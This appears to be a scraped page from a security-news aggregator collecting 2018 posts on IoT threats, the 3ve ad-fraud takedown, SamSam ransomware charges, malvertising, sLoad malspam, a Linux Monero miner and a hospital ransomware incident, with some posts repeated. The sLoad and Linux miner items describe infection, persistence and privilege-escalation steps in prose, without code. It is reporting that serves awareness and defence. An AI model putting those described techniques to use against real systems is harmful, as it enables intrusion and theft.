Triton, malware that attacks industrial control systems (ICS), has demonstrated the capabilities of adversaries to remotely target manufacturing environments through their adjacent IT environments. Identity platform and “edge device” breaches will provide the keys to adversaries to launch future remote ICS attacks due to static password use across environments and constrained edge devices, which lack secure system requirements due to design limitations. (An edge device is any network-enabled system hardware or protocol within an IoT product.) We expect multifactor authentication and identity intelligence will become the best methods to provide security in this escalating battle. We also predict identity intelligence will complement multifactor authentication to strengthen the capabilities of identity platforms.

Identity is a fundamental component in securing IoT. In these ecosystems, devices and services must securely identify trusted devices so that they can ignore the rest. The identity model has shifted from user centric in traditional IT systems to machine centric for IoT systems. Unfortunately, due to the integration of operational technology and insecure “edge device” design, the IoT trust model is built on a weak foundation of assumed trust and perimeter-based security.

At Black Hat USA and DEF CON 2018, 30 talks discussed IoT edge device exploitation. That’s a large increase from just 19 talks on the topic in 2017. The increase in interest was primarily in relation to ICS, consumer, medical, and “smart city” verticals. (See Figure 1.) Smart edge devices, combined with high-speed connectivity, are enabling IoT ecosystems, but the rate at which they are advancing is compromising the security of these systems.

Figure 1: The number of conference sessions on the security of IoT devices has increased, matching the growing threat to poorly protected devices. 

Most IoT edge devices provide no self-defense (isolating critical functions, memory protection, firmware protection, least privileges, or security by default) so one successful exploit owns the device. IoT edge devices also suffer from “break once, run everywhere” attacks—due to insecure components used across many device types and verticals. (See articles on WingOS and reverse engineering.)

McAfee Advanced Threat Research team engineers have demonstrated how medical device protocols can be exploited to endanger human life and compromise patients’ privacy due to assumed trust. These examples illustrate just a few of many possible scenarios that lead us to believe adversaries will choose IoT edge devices as the path of least resistance to achieve their objectives. Servers have been hardened over the last decade, but IoT hardware is far behind. By understanding an adversary’s motives and opportunities (attack surface and access capability), we can define a set of security requirements independent of a specific attack vector.

Figure 2 gives a breakdown of the types of vulnerabilities in IoT edge devices, highlighting weak points to address by building identity and integrity capabilities into edge hardware to ensure these devices can deflect attacks.

Figure 2: Insecure protocols are the primary attack surface in IoT edge devices.

IoT security must begin on the edge with a zero-trust model and provide a hardware root of trust as the core building block for protecting against hack and shack attacks and other threats. McAfee predicts an increase in compromises on identity platforms and IoT edge devices in 2019 due to the adoption of smart cities and increased ICS activity.

The post McAfee Labs 2019 Threats Predictions Report appeared first on McAfee Blogs.

Iranians Indicted in SamSam Ransomware Scheme

The federal government charged two Iranian men for orchestrating a nearly three-year-long international hacking and extortion scheme that deployed ransomware which to date has caused more than $30 million in losses to its victims, which include hospitals, municipalities and public institutions. A federal grand jury in New Jersey has indicted...

Read the whole entry... »

Related Stories

Security Affairs: FBI along with security firms dismantled 3ve Ad Fraud Operation

FBI along with cybersecurity firms dismantled a sophisticated ad fraud scheme that allowed its operators to earn tens of millions of dollars

Law enforcement and private firms such as Google and WhiteOps took down one of the largest and most sophisticated digital ad-fraud campaign, tracked as Dubbed 3ve, that infected over 1.7 million computers to carry out advertising frauds.

The name 3ve is derived from a set of three distinct sub-operations using unique measures to avoid detection, and each of them was built around different architectures with different components.

3ve has been active since at least 2014 and experts observed a peak in its activity in 2017. It has been estimated that the campaign allowed its operators to earn more than $30 million, people involved in the ad-fraud campaign are all from Eastern Europe.

The United States Department of Justice also issued indicted 8 individuals from Russia, Kazakhstan, and Ukraine.

Operators used a broad range of technique to monetize their efforts, they created fake versions of both websites and used their own botnet to simulate visitors’ activities, then offered ad spaces to advertisers, and Border Gateway Protocol hijacking for traffic redirection. Crooks also used malicious code to generate fake clicks over online ads and earn money.

“3ve operated on a massive scale: at its peak, it controlled over 1 million IPs from both residential botnet infections and corporate IP spaces, primarily in North America and Europe (for comparison, this is more than the number of broadband subscriptions in Ireland). It featured several unique sub-operations, each of which constituted a sophisticated ad fraud scheme in its own right.” read the report published by WhiteOps.

“Tech-savvy fraudsters try to produce fake traffic and fraudulent ad inventory to trick advertisers into believing that their ads are being seen by actual, interested users,” 

The size of the infrastructure involved in the 3ve ad-fraud campaign is very huge, according to the experts fraudsters infected 1.7 million computers with malware, attackers used thousands of servers and more than 10,000 counterfeit websites to impersonate legitimate web publishers.

The experts discovered that crooks used over 60,000 accounts selling ad inventory generating a record of 3 to 12 billion of daily ad bid requests.

“All told, 3ve controlled over 1 million IPs from both residential botnet infections and corporate IP spaces (as noted above, there were up to 700,000 active infections at any given time).” continues the report.

“In aggregate, the operation also produced more than 10,000 counterfeit domains, and generated over 3 billion daily bid requests at its peak. We estimate that portions of the bot operation spanned over 1,000 servers in data centers allocated to various functions needed for this type of large-scale operation”

Experts observed three 3ve operations during their investigation:

3VE.1—The BOAXXE Malware Scheme (aka METHBOT /MIUREF)

So-called 3ve.1 sub-operation leveraged a the Boaxxe botnet, aka Miuref and Methbot, composed of infected systems in data centers across the US and Europe.

Attackers also carried out BGP hijacking to obtain IP addresses used for traffic proxying from the compromised bots the data centers. The infected systems were used to visit both fake and real web pages.

“All the fake ad requests from 3ve.1 initially pretended to be from desktop browsers, but this changed over time, with the operation increasingly relying on spoofed mobile traffic. This was done by the data center-based browsers pretending to be Android devices.” continues the report.

“There were two unique, active mobile misrepresentation schemes: in one the ad requests were spoofed to look like they came from mobile apps, in the other the ad requests were spoofed to look like they came from mobile browsers. The spoofing was achieved by overriding the parameters typically used to determine what type of device the traffic came from”

According to the investigators, between September 2014 and December 2016, the scheme involved over 1,900 servers hosted in commercial data centers to load ads from advertisers on over 5,000 counterfeit websites. With this scheme, fraudsters generated millions of dollars in profit for its operators.

3VE.2—The KOVTER Malware Scheme

In this second scheme, attackers used counterfeit domains to sell fake ad inventory to advertisers. Attaclers used a hidden, custom-built browsing agent (Chromium Embedded Framework) on more than 700,000 computers that were compromised with the Kovter malware.

Fraudsters used redirection servers that instructed the infected computers to visit fake web pages operated by the gang.

3VE.3—Data Centers IPs as Proxies

In the third sub-operation bots were installed in data centers and used the IP addresses of other data centers as proxies.

The 3ve campaign was first spotted in 2016 by ESET that tracked the botnet as Boaxxe botnet.

Security firms helped the FBI to shut down the massive ad-fraud operation. Law enforcement obtained warrants that allowed them to seize 31 internet domains and 89 servers of the 3ve infrastructure.

Pierluigi Paganini

(Security Affairs – 3ve botnet, ad-fraud)

The post FBI along with security firms dismantled 3ve Ad Fraud Operation appeared first on Security Affairs.



Security Affairs

FBI along with security firms dismantled 3ve Ad Fraud Operation

FBI along with cybersecurity firms dismantled a sophisticated ad fraud scheme that allowed its operators to earn tens of millions of dollars

Law enforcement and private firms such as Google and WhiteOps took down one of the largest and most sophisticated digital ad-fraud campaign, tracked as Dubbed 3ve, that infected over 1.7 million computers to carry out advertising frauds.

The name 3ve is derived from a set of three distinct sub-operations using unique measures to avoid detection, and each of them was built around different architectures with different components.

3ve has been active since at least 2014 and experts observed a peak in its activity in 2017. It has been estimated that the campaign allowed its operators to earn more than $30 million, people involved in the ad-fraud campaign are all from Eastern Europe.

The United States Department of Justice also issued indicted 8 individuals from Russia, Kazakhstan, and Ukraine.

Operators used a broad range of technique to monetize their efforts, they created fake versions of both websites and used their own botnet to simulate visitors’ activities, then offered ad spaces to advertisers, and Border Gateway Protocol hijacking for traffic redirection. Crooks also used malicious code to generate fake clicks over online ads and earn money.

“3ve operated on a massive scale: at its peak, it controlled over 1 million IPs from both residential botnet infections and corporate IP spaces, primarily in North America and Europe (for comparison, this is more than the number of broadband subscriptions in Ireland). It featured several unique sub-operations, each of which constituted a sophisticated ad fraud scheme in its own right.” read the report published by WhiteOps.

“Tech-savvy fraudsters try to produce fake traffic and fraudulent ad inventory to trick advertisers into believing that their ads are being seen by actual, interested users,” 

The size of the infrastructure involved in the 3ve ad-fraud campaign is very huge, according to the experts fraudsters infected 1.7 million computers with malware, attackers used thousands of servers and more than 10,000 counterfeit websites to impersonate legitimate web publishers.

The experts discovered that crooks used over 60,000 accounts selling ad inventory generating a record of 3 to 12 billion of daily ad bid requests.

“All told, 3ve controlled over 1 million IPs from both residential botnet infections and corporate IP spaces (as noted above, there were up to 700,000 active infections at any given time).” continues the report.

“In aggregate, the operation also produced more than 10,000 counterfeit domains, and generated over 3 billion daily bid requests at its peak. We estimate that portions of the bot operation spanned over 1,000 servers in data centers allocated to various functions needed for this type of large-scale operation”

Experts observed three 3ve operations during their investigation:

3VE.1—The BOAXXE Malware Scheme (aka METHBOT /MIUREF)

So-called 3ve.1 sub-operation leveraged a the Boaxxe botnet, aka Miuref and Methbot, composed of infected systems in data centers across the US and Europe.

Attackers also carried out BGP hijacking to obtain IP addresses used for traffic proxying from the compromised bots the data centers. The infected systems were used to visit both fake and real web pages.

“All the fake ad requests from 3ve.1 initially pretended to be from desktop browsers, but this changed over time, with the operation increasingly relying on spoofed mobile traffic. This was done by the data center-based browsers pretending to be Android devices.” continues the report.

“There were two unique, active mobile misrepresentation schemes: in one the ad requests were spoofed to look like they came from mobile apps, in the other the ad requests were spoofed to look like they came from mobile browsers. The spoofing was achieved by overriding the parameters typically used to determine what type of device the traffic came from”

According to the investigators, between September 2014 and December 2016, the scheme involved over 1,900 servers hosted in commercial data centers to load ads from advertisers on over 5,000 counterfeit websites. With this scheme, fraudsters generated millions of dollars in profit for its operators.

3VE.2—The KOVTER Malware Scheme

In this second scheme, attackers used counterfeit domains to sell fake ad inventory to advertisers. Attaclers used a hidden, custom-built browsing agent (Chromium Embedded Framework) on more than 700,000 computers that were compromised with the Kovter malware.

Fraudsters used redirection servers that instructed the infected computers to visit fake web pages operated by the gang.

3VE.3—Data Centers IPs as Proxies

In the third sub-operation bots were installed in data centers and used the IP addresses of other data centers as proxies.

The 3ve campaign was first spotted in 2016 by ESET that tracked the botnet as Boaxxe botnet.

Security firms helped the FBI to shut down the massive ad-fraud operation. Law enforcement obtained warrants that allowed them to seize 31 internet domains and 89 servers of the 3ve infrastructure.

Pierluigi Paganini

(Security Affairs – 3ve botnet, ad-fraud)

The post FBI along with security firms dismantled 3ve Ad Fraud Operation appeared first on Security Affairs.

Today’s Data Breach Environment: An Overview

By now, companies and consumers alike are well aware of the threat of a data breach. Large and small businesses across every sector have been targeted, and many customers are now familiar with the notification that their username, password or other details might have been compromised.

The unfortunate fact is that, despite efforts on the part of cybersecurity vendors and enterprises, the rate of infection and the vast number of threats continues to rise. Hackers are savvy and can adjust a sample just enough to fly under the radar of advanced security solutions. Worse still, once they’ve broken through the back door, cybercriminals can remain within systems and infrastructure for longer periods, stealing and snooping on more sensitive information in the process.

Today, we’re taking a closer look at the overarching environment of data breaches, including the stats and figures that demonstrate the size and impact of current threats, what takes place during and after a breach, and how enterprises can improve their protections.

By the numbers: Top data breach threats

There’s no shortage of facts and data when it comes to data breaches. According to current reports – including Trend Micro’s 2018 Midyear Security Roundup: Unseen Threats, Imminent Losses – some of today’s top threats include:

  • Ransomware: Although Trend Micro discovered only a slight increase in ransomware activity during the first half of 2018, coming in at a 3 percent rise, ransomware continues to pose a threat to enterprise systems everywhere. Even with a 26 percent decrease in the number of newly detected sample families, ransomware is still being put to work, encrypting files and enabling hackers to demand high Bitcoin ransoms.
  • Cryptomining: Unpermitted cryptocurrency mining is also a threat to enterprise security – and may be more dangerous than many organizations realize. Trend Micro researchers found a more than 140 percent increase in malicious cryptocurrency mining activity in the first six months of this year, compared to the same period last year. These programs operate in the background and steal valuable computing and utility resources, driving up costs and scaling back critical performance for legitimate business processes as a result.
  • BEC and email-served malware: Instances of business email compromise, wherein hackers target victims to enable fraudulent wire transfers, are also continuing to impact organizations with foreign partners all over the globe. Making matters worse is that this is far from the only threat that involves the critical communication channel of email – Verizon’s 2018 Breach Investigations Report found that 92 percent of all malware is still being served up through malicious emails, including through phishing attacks and the inclusion of infected links or attachments.

Mega breaches on the rise

Once an email recipient opens such a link or attachment, it’s akin to leaving the door wide open for intruders.

Current data shows that it takes an average of 191 days to even realize that a breach has taken place, according to Small Business Trends contributor David William. That’s about 27 weeks, or more than six months.

“This slow response to cyber-attacks is alarming,” William wrote. “It puts small businesses in a precarious position and demonstrates a dire need for cybersecurity awareness and preparedness in every business.”

Compounding this problem is the fact that the longer hackers are able to stay within business systems undetected, the more time they have to steal data and other sensitive intellectual property. This has contributed to a steep rise in mega breaches, Trend Micro research shows, which involve the exposure or compromise of more than one million data records.

Leveraging data from Privacy Rights Clearinghouse, Trend Micro researchers discovered that overall, there has been a 16 percent increase in mega breaches compared to 2017. During the first half of 2018 alone, 259 mega breaches were reported, compared to 224 during the same period in 2017.

Surprisingly, and unfortunately, the majority of these instances came due to unintended disclosure of data. Those that resulted from hacking or malware was slightly less, and a smaller percentage came as a result of physical data loss.

And, as researchers pointed out, the loss or compromise of data isn’t the only issue to be aware of here.

“There are substantial consequences for enterprises that are hit by data breaches,” Trend Micro researchers wrote. “Recovery and notification costs, revenue losses, patching and downtime issues, and potential legal fees can add up: A mega breach can cost companies up to $350 million.”

How does this happen? Typical steps within a data breach

One of the first things enterprises can do to bolster their security protections is to support increased awareness of data breach processes and what takes place before and during an attack.

In this way, stakeholders – particularly those within the IT team – can be more vigilant and proactive in recognizing security issues or suspicious behaviors that might point to the start of an attack.

As Trend Micro explained, there are several steps that most data breaches include:

  1. Research: Before an attack ever begins, hackers will often carry out research on their target. This might include background research on victims to support phishing and social engineering, or looking into the company’s IT systems to pinpoint unpatched weaknesses or other exploitable vulnerabilities. This step is all about looking for an entrance, or a springboard that cybercriminals can use to launch their attack.
  2. Attack: Once attackers have done their research, they use this knowledge for either a network-targeted attack, or a social attack.
  3. Pinpointing the network or social: As Trend Micro explained, a network attack involves malicious infiltration within the victim’s infrastructure, a particular platform or application. A social attack, on the other hand, relies on duping an employee user (with a malicious attachment, for example) into providing access to the company network or infrastructure.
  4. Data exfiltration: After successfully infiltrating the company’s systems, attackers seek out sensitive information, including often customer details and payment data. The hacker will then exfiltrate this data, usually to a command and control server belonging to the attacker.

Depending upon the business, the industry in which it operates and the type of data stolen, hackers will then either look to sell this information, or use it to support other malicious activity. Attackers will most often look for details like customer names, birth dates, Social Security numbers, email and mailing addresses, phone numbers, bank account numbers, clinical patient information or claims details.

“Hackers search for these data because they can be used to make money by duplicating credit cards, and using personal information for fraud, identity theft, and even blackmail,” Trend Micro stated. “They can also be sold in bulk in Deep Web marketplaces.”

The current breach environment is sophisticated and challenging for overall enterprise security. To find out more about current threats and how your organization can protect its most critical data and systems, connect with the security experts at Trend Micro today.

The post Today’s Data Breach Environment: An Overview appeared first on .

U.S Charges Two Iranian Hackers for SamSam Ransomware Attacks

The Department of Justice announced Wednesday charges against two Iranian nationals for their involvement in creating and deploying the notorious SamSam ransomware. The alleged hackers, Faramarz Shahi Savandi, 34, and Mohammad Mehdi Shah, 27, have been charged on several counts of computer hacking and fraud charges, the indictment unsealed today at New Jersey court revealed. The duo used

FBI & Google shut down largest-ever Ad fraud scheme ‘3VE’

By Waqas

8 suspects behind 3VE have also been identified. Last year in August, the Federal Bureau of Investigation organized a secret meet-up between cybersecurity and digital advertising experts in its Manhattan federal building. This included Google and nearly 20 tech firms while there were nearly 30 attendees at the meeting. The agenda of the meeting was to […]

This is a post from HackRead.com Read the original post: FBI & Google shut down largest-ever Ad fraud scheme ‘3VE’

Lenovo to pay $7.3m for installing adware in 750,000 laptops

By Waqas

In 2015, Beijing based laptop manufacturer and seemingly reliable technology company Lenovo made headlines that its 750,000 laptops had pre-installed adware called VisualDiscovery developed by Superfish. The adware played a vital role in compromising online security protections installed by the users on their laptops, accessed financial data and performed man-in-the-middle attack on private and secure connections […]

This is a post from HackRead.com Read the original post: Lenovo to pay $7.3m for installing adware in 750,000 laptops

How to Defend Against Malvertising Drive-By Attacks

Many longtime internet users will remember receiving pop-up ads warning that their computers were infected with a virus. In nearly all cases, the ad’s specific claims were bogus; the purpose was to scare users into paying for a questionable tech support service or to drive them to a site that would actually infect them with malware.

While browser-based pop-up blockers have largely killed off that particular scam, malicious advertising — or malvertising — is still causing serious damage. Purveyors of malvertisements use an increasingly broad range of techniques to insert malware into ads that run across the web on large advertising networks.

How Malvertising Works

In most cases, threat actors create fake advertisements laden with malware and try to slip them past security checks at large ad networks. These infected ads can then sneak malware onto a web user’s computer, even if he or she doesn’t click on the ad. These so-called drive-by downloads are particularly effective against users who don’t regularly update their software.

The cost of malvertising is huge: A report from ad verification vendor GeoEdge estimated that the threat costs the online advertising industry more than $1.1 billion a year, and anticipated the cost rising another 20–30 percent in 2019.

Know Your Malvertisers

A lack of transparency in the digital ad supply chain “makes loading malicious ads through legitimate ad networks rather painless,” said Alex Calic, strategic technology partnerships officer for The Media Trust, a vendor of digital advertising and app security products. “The sheer number of ads and the large number of digital partners, many unknown to each other, along the supply chain make tracing the malicious code back to the correct offending party extremely difficult.”

It’s tough for ad brokers to keep up with the threat actors, added Jason Hong, associate professor at Carnegie Mellon’s School of Computer Science.

“It’s a cat-and-mouse game. Ad networks need to scan ad submissions for malware, but it can be really hard because attackers have a really strong economic incentive to keep innovating new ways of spreading malware.”

Call in Back-Up

The online advertising industry needs more processes to check submitted ads, added Corey Nachreiner, chief technology officer (CTO) of network security vendor WatchGuard Technologies.

“There are many web tools and frameworks that can help ad brokers escape or remove certain types of web code, such as JavaScript,” he said. “The brokers simply need to check the HTML ads being submitted to them, and make sure they only have clean content and don’t try to invisibly redirect to any off-site source.”

Ad brokers can also require more information from new customers as a way to validate them, he added. But attackers can hide malware in images and other elements, meaning that security teams may need to do more than simply scan the ads.

“Malvertising campaigns regularly slip under the radar of the advertising networks because they typically aren’t spotted until the first victims speak out, by which point it’s already too late,” said Gavin Hill, vice president of product and strategy for cybersecurity vendor Bromium. “Concealing malware within objects or images within the site, or forcing redirects for certain users, makes it extremely difficult for the advertising networks to spot malicious adverts being delivered.”

Using sophisticated tools to hide the malware in the ads, attackers can create highly targeted malvertising campaigns that fuse cybercrime and targeted marketing, Hill added.

“It’s all too easy for cybercriminals to exploit networks for their own gain,” he said. Threat actors can “deliver malicious code to vulnerable users that don’t suspect a thing.”

Broaden Your Thinking

Hill called for a holistic approach to fighting cybercrime by understanding “how the vast cybercrime economy operates.” Hong agreed.

“It really needs to be an entire community effort in combating malvertising,” he said. “Ad networks are the front line and need to improve their malware detection capabilities. We also need to hit the attackers’ finances, too, making it harder for them to monetize.”

To protect themselves from malvertising, consumers should prioritize patching. Users need to keep their software up to date to protect against malicious ads targeting known vulnerabilities.

“On end-user client side, patch, patch, and patch,” said Oliver Münchow, security evangelist with cybersecurity prevention firm Lucy Security. “And beware of the risks associated with downloads and clicks.”

In the end, maintaining your patching cadence and implementing only necessary and heavily vetted browsing tools should be a part of any routine security program. But keeping an extra eye on malvertising strategies and expanding knowledge of threat campaigns overall should help solidify another wall of the data security fortress.

The post How to Defend Against Malvertising Drive-By Attacks appeared first on Security Intelligence.

Malwarebytes’ 2019 security predictions

Every year, we at Malwarebytes Labs like to stare into our crystal ball and foretell the future of malware.

Okay, maybe we don’t have a crystal ball, but we do have years and years of experience in observing trends and sensing shifts in patterns. When it comes to security, though, we can only know so much. For example, we guarantee there’ll be some kind of development that we had zero indication would occur. We also can pretty much assure you that data breaches will keep happening—just as the sun rises and sets.

And while all hope is for a malware-free 2019, the reality will likely look a little more like this:

New, high-profile breaches will push the security industry to finally solve the username/password problem. The ineffective username/password conundrum has plagued consumers and businesses for years. There are many solutions out there—asymmetric cryptography, biometrics, blockchain, hardware solutions, etc.—but so far, the security industry has not been able to settle on a standard to fix the problem. In 2019, we will see a more concerted effort to replace passwords altogether.

IoT botnets will come to a device near you. In the second half of 2018, we saw several thousand MikroTik routers hacked to serve up coin miners. This is only the beginning of what we will likely see in the new year, with more and more hardware devices being compromised to serve up everything from cryptominers to Trojans. Large scale compromises of routers and IoT devices are going to take place, and they are a lot harder to patch than computers. Even just patching does not fix the problem, if the device is infected.

Digital skimming will increase in frequency and sophistication. Cybercriminals are going after websites that process payments and compromising the checkout page directly. Whether you are purchasing roller skates or concert tickets, when you enter your information on the checkout page, if the shopping cart software is faulty, information is sent in clear text, allowing attackers to intercept in real time. Security companies saw evidence of this with the British Airways and Ticketmaster hacks.

Microsoft Edge will be a prime target for new zero-day attacks and exploit kits. Transitioning out of IE, Microsoft Edge is gaining more market share. We expect to see more mainstream Edge exploits as we segue to this next generation browser. Firefox and Chrome have done a lot to shore up their own technology, making Edge the next big target.

EternalBlue or a copycat will become the de facto method for spreading malware in 2019. Because it can self-propagate, EtnernalBlue and others in the SMB vulnerability present a particular challenge for organizations, and cybercriminals will exploit this to distribute new malware.

Cryptomining on desktops, at least on the consumer side, will just about die. Again, as we saw in October (2018) with MikroTik routers being hacked to serve up miners, cybercriminals just aren’t getting value out of targeting individual consumers with cryptominers. Instead, attacks distributing cryptominers will focus on platforms that can generate more revenue (servers, IoT) and will fade from other platforms (browser-based mining).

Attacks designed to avoid detection, like soundloggers, will slip into the wild. Keyloggers that record sounds are sometimes called soundloggers, and they are able to listen to the cadence and volume of tapping to determine which keys are struck on a keyboard. Already in existence, this type of attack was developed by nation-state actors to target adversaries. Attacks using this and other new attack methodologies designed to avoid detection are likely to slip out into the wild against businesses and the general public.

Artificial Intelligence will be used in the creation of malicious executables While the idea of having malicious AI running on a victim’s system is pure science fiction at least for the next 10 years, malware that is modified by, created by, and communicating with an AI is a dangerous reality. An AI that communicates with compromised computers and monitors which and how certain malware is detected can quickly deploy countermeasures. AI controllers will enable malware built to modify its own code to avoid being detected on the system, regardless of the security tool deployed. Imagine a malware infection that acts almost like “The Borg” from Star Trek, adjusting and acclimating its attack and defense methods on the fly based on what it is up against.

Bring your own security grows as trust declines. More and more consumers are bringing their own security to the work place as a first or second layer of defense to protect their personal information. Malwarebytes recently conducted global research and found that nearly 200,000 companies had a consumer version of Malwarebytes installed. Education was the industry most prone to adopting BYOS, followed by software/technology and business services. 

The post Malwarebytes’ 2019 security predictions appeared first on Malwarebytes Labs.

The SLoad Powershell malspam is expanding to Italy

A new malspam campaign hit Italy in this days, threat actors are spreading a new variant of a powerful downloader named sLoad.

sLoad is a sophisticated script, used in the past to deliver different types of malware such as the dreaded “Ramnit banker”.

“In the past months CERT-Yoroi observed an emerging attack pattern targeting its constituency. These series of malicious email messages shared common techniques may be likely related to a single threat group starting its operation against the Italian cyber panorama.” reads the analysis published by Yoroi.

“It is still not clear if these attack attempts may be originated by a any well established cybercrime group modifying its TTP or a completely new one, however CERT-Yoroi is tracking this threat with the internal codename “Sload-ITA” (TH-163) .”

sLoad implements a broad range of capabilities including the ability to take screenshots, read the list of running process, exfiltrate DNS cache, exfiltrate outlook e-mail and other typical spyware functionalities.

As usual, it comes as a zip file attached to an e-mail, this file contains two elements:

  1. A fake shortcut to directory (.lnk file);
  2. Legitimate image flagged as hidden.

It is strange that the image is not used into the malware’s workflow, but the link file starts a complex infection chain, as shown in the following figure:

sLoad

First of all, the .lnk file runs a first PowerShell activator, which searches a file named: “documento-aggiornato-novembre-*.zip”.

Then, if the .zip file exists, the PowerShell script extracts and runs a portion of a code present at the end of the same file. Once the PowerShell script has been extracted, it runs another Powershell script that acts as a subsequent dropper in the attack chain.

This ps code abuses the BitsTransfer windows functionality to download two important files: config.ini and web.ini that contains the final sLoad stage.

The malicious code gains persistence using a task defined into System Task Scheduler that runs a Visual Basic script.

At the end, when sLoad is started, it periodically takes screenshots, gathers system’s information and sends other data to the C2 .

Technical details, including IoCs and Yara Rules, about the sLoad malware are available on the Yoroi blog.

The SLoad Powershell Threat is Expanding to Italy

Pierluigi Paganini

(Security Affairs – malspam, malware)

The post The SLoad Powershell malspam is expanding to Italy appeared first on Security Affairs.

Rogue Developer Infects Widely Used NodeJS Module to Steal Bitcoins

A widely used third-party NodeJS module with nearly 2 million downloads a week was compromised after one of its open-source contributor gone rogue, who infected it with a malicious code that was programmed to steal funds stored in Bitcoin wallet apps. The Node.js library in question is "Event-Stream," a toolkit that makes it easy for developers to create and work with streams, a collection of

Podcast Episode 122: will 5G increase Internet of Things Risk?

Telecommunications firms like to talk up all the great things that so-called 5G cellular networks will bring to smart phones. But what new kinds of Internet of Things use cases may become possible? And, just as important, what are the security implications of massively distributed IoT endpoints connected to capacious 5G cellular infrastructure?...

Read the whole entry... »

Related Stories

Security Affairs: Ransomware attack disrupted emergency rooms at Ohio Hospital System

Ransomware attacks continue to threaten the healthcare industry, the last incident in order of time impacted the Ohio Hospital System.

The ransomware attack infected computer systems at the East Ohio Regional Hospital and Ohio Valley Medical Center reportedly caused the disruption of the hospitals’ emergency rooms.

The malware hit the Ohio Hospital System on Friday, Nov. 23, evening, according to The Times Ledger newspaper, the hospitals were not able to accept ER patients via emergency responders.

“Emergency squad patients are being diverted away from East Ohio Regional Hospital and Ohio Valley Medical Center this weekend because the hospitals’ computer system has been attacked by Ransomware.” reads The Times Ledger newspaper.

“Area emergency squads began transporting patients to other area hospitals after receiving notification of the full diversion.”

The patients were diverted to other area hospital emergency rooms.

East Ohio Regional Hospital

Karin Janiszewski, director of marketing and public relations for the hospitals, explained that the two hospitals were able to handle walk-in ER patients.

“At the moment, our emergency rooms are unable to take patients by E-squads, but we can take patients by walk-in,” Janiszewski said. “Our IT team is working around the clock right now and we expect to have the issue resolved by (Sunday).”

The IT staff plan to completely restore normal operation by Sunday, November 25. The good news is that no data was exposed due to the ransomware attack.

“We have redundant security, so the attack was able to get through the first layer but not the second layer,” she added. “There has been no patient information breach.”

Pierluigi Paganini

(Security Affairs – ransomware, Ohio Hospital System)

The post Ransomware attack disrupted emergency rooms at Ohio Hospital System appeared first on Security Affairs.



Security Affairs

Ransomware attack disrupted emergency rooms at Ohio Hospital System

Ransomware attacks continue to threaten the healthcare industry, the last incident in order of time impacted the Ohio Hospital System.

The ransomware attack infected computer systems at the East Ohio Regional Hospital and Ohio Valley Medical Center reportedly caused the disruption of the hospitals’ emergency rooms.

The malware hit the Ohio Hospital System on Friday, Nov. 23, evening, according to The Times Ledger newspaper, the hospitals were not able to accept ER patients via emergency responders.

“Emergency squad patients are being diverted away from East Ohio Regional Hospital and Ohio Valley Medical Center this weekend because the hospitals’ computer system has been attacked by Ransomware.” reads The Times Ledger newspaper.

“Area emergency squads began transporting patients to other area hospitals after receiving notification of the full diversion.”

The patients were diverted to other area hospital emergency rooms.

East Ohio Regional Hospital

Karin Janiszewski, director of marketing and public relations for the hospitals, explained that the two hospitals were able to handle walk-in ER patients.

“At the moment, our emergency rooms are unable to take patients by E-squads, but we can take patients by walk-in,” Janiszewski said. “Our IT team is working around the clock right now and we expect to have the issue resolved by (Sunday).”

The IT staff plan to completely restore normal operation by Sunday, November 25. The good news is that no data was exposed due to the ransomware attack.

“We have redundant security, so the attack was able to get through the first layer but not the second layer,” she added. “There has been no patient information breach.”

Pierluigi Paganini

(Security Affairs – ransomware, Ohio Hospital System)

The post Ransomware attack disrupted emergency rooms at Ohio Hospital System appeared first on Security Affairs.

A week in security (November 19 – 25)

Last week on Malwarebytes Labs, we took a look at a devastating business email compromise attack, web skimming antics, and the fresh perils of Deepfakes. We also checked out some Chrome bug issues, and took the deepest of deep dives into DNA testing.

Other cybersecurity news

Stay safe, everyone!

The post A week in security (November 19 – 25) appeared first on Malwarebytes Labs.

Experts found a new powerful modular Linux cryptominer

Security experts from Russian antivirus firm Dr.Web have discovered a new strain of Linux cryptominer tracked as Linux.BtcMine.174.

The Linux cryptominer has a multicomponent structure that implements a broad range of features in over 1,000 lines of code.

When the Monero Linux cryptominer is first executed it checks whether the server, from which the Trojan will subsequently download additional modules, is available.

Then it finds a folder on disk to which it has write permissions so it can copy itself and use it as a repository for the downloading of additional modules.

The Linux.BtcMine.174 Linux cryptominer uses one of two privilege escalation exploits CVE-2016-5195 (aka Dirty COW) and CVE-2013-2094 to get root permissions on the infected system.

The Linux miner also adds itself as an autorun entry to files like /etc/rc.local/etc/rc.d/…, and /etc/cron.hourly; and then downloads and runs a rootkit.

“If the script is not run with /sbin/init, the following actions are performed:

  1. The script is moved to a previously selected folder with write permissions (rwx) that is named diskmanagerd (the name is specified in the $WatchDogName variable).
  2. The script tries to restart using nohup or just in the background if nohup is not installed (in this case, the Trojan installs the coreutils package). ” Reads the analysis published by Dr. Web.

Once the malware has infected the Linux system, it will scan and terminate the processes of several miners, it scans /proc/${pid}/exe and /proc/${pid}/cmdline to check for specific lines (cryptonight, stratum+tcp, etc.). Experts also discovered that the Trojan also kill antivirus software, including Avast, AVG, Dr.Web and ESET.

Then the Linux.BtcMine.174. downloads and starts its own Monero-mining operation.

Linux.BtcMine.174 also downloads and executes with the ability to steal user-entered passwords for the su command and to hide files in the file system, network connections, and running processes.

The Trojan also collects data for all the hosts to which the current user has previously connected via SSH and tries to connect them.

Experts believe the malware is spreading using SSH credentials stolen on the infected systems.

Additional technical details are included in the report published by Dr.Web, the experts also published SHA1 hashes for the various components of the malware on GitHub.

Pierluigi Paganini

(Security Affairs – Linux cryptominer, Linux.BtcMine.174)

The post Experts found a new powerful modular Linux cryptominer appeared first on Security Affairs.

McAfee Blogs: 8 Ways to Secure Your Family’s Online Holiday Shopping

It’s officially the most wonderful time of the year — no doubt about it. But each year, as our reliance and agility on our mobile devices increases, so too might our impulsivity and even inattention when it comes to digital transactions.

Before getting caught up in the whirlwind of gift giving and the thrill of the perfect purchase, consider taking a small pause. Stop to consider that as giddy as you may be to find that perfect gift, hackers are just as giddy this time of year to catch shoppers unaware and snatch what they can from the deep, digital holiday coffers. In fact, according to the FBI’s Internet Crime Complaint Center, the number one cybercrime of 2017 was related to online shopping; specifically, payment for or non-delivery of goods purchased.

8 Ways to Secure Your Family’s Holiday Shopping Online

  1. Make it a family discussion. Make no assumptions when it comes to what your kids do and do not understand (and practice) when it comes to shopping safely online. Go over the points below as a family. Because kids are nearly 100% mobile, online shopping and transactions can move swiftly, and the chances of making a mistake or falling prey to a scam can increase. Caution kids to slow down and examine every website and link in the buying journey.
